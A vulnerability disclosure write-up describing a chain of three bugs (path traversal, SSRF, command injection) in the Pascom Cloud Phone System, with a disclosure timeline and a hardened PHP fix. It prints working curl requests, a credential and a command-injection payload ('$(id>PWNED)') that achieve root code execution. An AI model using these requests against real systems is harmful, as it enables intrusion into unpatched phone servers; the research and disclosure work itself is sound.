The story of 3 bugs that led to Unauthorized RCE — Pascom Systems

Introduction

Pascom Cloud Phone System (CPS) provides integrated communication solutions for businesses and individuals. You can read more about it here.

Pascom CPS System Structure

Before we get into the vulnerabilities we should look at how the pascom CPS is structured. The system runs a Linux-based OS, but the products are deployed in an interesting way: instead of running all services in the same environment (the host OS), CPS runs multiple LXC containers, each providing a set of services.

Path traversal in Nginx to Tomcat reverse proxy requests (CVE-2021-45968)

The web UI exposes a Java endpoint through an Nginx reverse proxy. Using a known path traversal issue (see here) caused by URI parsing inconsistencies between Nginx and Tomcat, we can reach endpoints that are not meant to be exposed. This becomes more interesting when coupled with the next bug.

# From /etc/nginx/nginx.conf in `pascom-<hostname>` container
# Xmppserver proxy /services/pluginscript -> localhost:9090
location ^~ /services/pluginscript {
    rewrite ^/services/pluginscript/(.*) /$1 break;
    proxy_pass http://127.0.0.1:9090/plugins/mobydick/pluginscript/$1$is_args$query_string;
}

Outdated Openfire (XMPP server) jar causes SSRF (CVE-2021-45967)

The CPS includes an instance of the Openfire XMPP server by Ignite Realtime. This server can be reached from the web interface, but only a few servlets are exposed. Using the path traversal bug we found, we can access any of its endpoints.

  • Use the password to exploit the last bug (RCE)
# Dump the password
curl -k --path-as-is 'https://192.168.56.105/pascom-confirm/services/pluginscript/..;/..;/..;/getFavicon?host=localhost/services/sysinfo/activeconfig?' -o - 2>/dev/null| jq | grep moby
# Use the password to dump some stuff (Make sure we got the right one)
curl -vk --path-as-is -u "moby:hYXanvhQaD70wOB" "https://192.168.56.105/pascom-confirm/services/sysinfo/activeconfig" -o - 2>/dev/null | grep password

Command Injection in the scheduled task (CVE-2021-45966)

One of the features of CPS is the ability to schedule and execute tasks through a daemon named exd.pl, which runs as root. The daemon and the REST service are synchronised through an SQLite database stored at /var/lib/pascom/exd.db inside the container named after the hostname. When a user requests that a task be executed, the request is added to the database; within a few seconds, exd.pl reads it from the database and executes the task.

class tsk050380 extends ex_task {
    public function perform( $pars ){
        if (count($pars) < 2 || count($pars) > 4) {
            $this->logError('Wrong parameters');
            return false;
        }
        // Check parameters
        $tarfile = $pars[0];
        $targetdir = $pars[1];
        if (count($pars) > 2)
            $deleteOutDir = $pars[2];
        else
            $deleteOutDir = false;
        if (count($pars) > 3)
            $createOutDir = $pars[3];
        else
            $createOutDir = false;
        if ($createOutDir && !is_dir($targetdir)) {
            if (!mkdir($targetdir, 0777, true)) {
                $this->logError("Failed to create output directory: $targetdir");
                return false;
            }
        }
        if (!is_dir($targetdir)) {
            $this->logError("No such directory: $targetdir");
            return false;
        }
        if (!is_file($tarfile)) {
            $this->logError("No such file: $tarfile");
            return false;
        }
        if ($deleteOutDir) {
            $this->logMessage('Clean output directory');
            // RCE: $targetdir is derived from user input and is concatenated into a shell
            // command without sanitisation. realpath() does not neutralise shell
            // metacharacters, and with $createOutDir set the directory was just created
            // under exactly that name, so realpath() returns it unchanged.
            $ret = $this->execute('rm -rf ' . realpath($targetdir) . '/*');
            if ($ret !== 0) {
                // ...
            }
        }
        // ...
    }
}

# RCE request
curl -k -o - --path-as-is -u "moby:hYXanvhQaD70wOB" "https://192.168.56.105/pascom-confirm/services/apply" -H 'Content-Type: application/json' -d '{"task":"050380","executor":"tsk", "args": ["/etc/passwd", "/tmp/MAD_DIR$(id>PWNED)","True","True"] }' 2>/dev/null | jq
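A hardened version of the vulnerable "clean output directory" step, as an added example that is not Pascom's code: the directory argument is validated against a fixed base directory and its contents are removed with PHP's own filesystem API instead of a shell command. ALLOWED_BASE and the function names are assumptions for illustration.

```php
<?php
// Added example (not Pascom's code): hardened "clean output directory" step; ALLOWED_BASE and names are assumed.

// Only directories below this base may ever be cleaned (assumed location).
const ALLOWED_BASE = '/var/lib/pascom/tasks';

// Returns the canonical path if $targetdir is an existing directory strictly
// inside ALLOWED_BASE, or null when the request must be rejected.
function resolveOutputDir(string $targetdir): ?string
{
    // Plain absolute path of safe characters only; $ ( ) ; | & ` and
    // whitespace (the metacharacters used in the request above) never pass.
    if (!preg_match('#\A/[A-Za-z0-9_./-]+\z#', $targetdir)) {
        return null;
    }
    $real = realpath($targetdir);   // resolves ../ segments and symlinks
    if ($real === false || !is_dir($real)) {
        return null;
    }
    $base = rtrim(ALLOWED_BASE, '/') . '/';
    if ($real . '/' === $base || strncmp($real . '/', $base, strlen($base)) !== 0) {
        return null;                // the base itself, or anything outside it
    }
    return $real;
}

// Empties a validated directory with PHP's own filesystem calls: no shell is
// spawned, so nothing in the path can be interpreted as a command.
function cleanOutputDir(string $targetdir): bool
{
    $dir = resolveOutputDir($targetdir);
    if ($dir === null) {
        return false;
    }
    $entries = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::CHILD_FIRST
    );
    foreach ($entries as $entry) {
        // Symlinked directories are unlinked, never descended into or rmdir'ed.
        if ($entry->isDir() && !$entry->isLink()) {
            rmdir($entry->getPathname());
        } else {
            unlink($entry->getPathname());
        }
    }
    return true;
}

// Validate the directory argument from the exploit request above.
var_dump(resolveOutputDir('/tmp/MAD_DIR$(id>PWNED)'));
```

If a shell command cannot be avoided, the validated path should still go through escapeshellarg() rather than being concatenated raw.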

RCE Demo

A demo of the chain, with local privilege escalation to root.

Timeline

  • Dec 29, 2021 → Initial contact with Pascom
  • Jan 3, 2022 → Sent vulnerability details
  • Jan 5, 2022 → Pascom prepares patches, and a grace period before disclosure is set
  • Mar 7, 2022 → Public disclosure
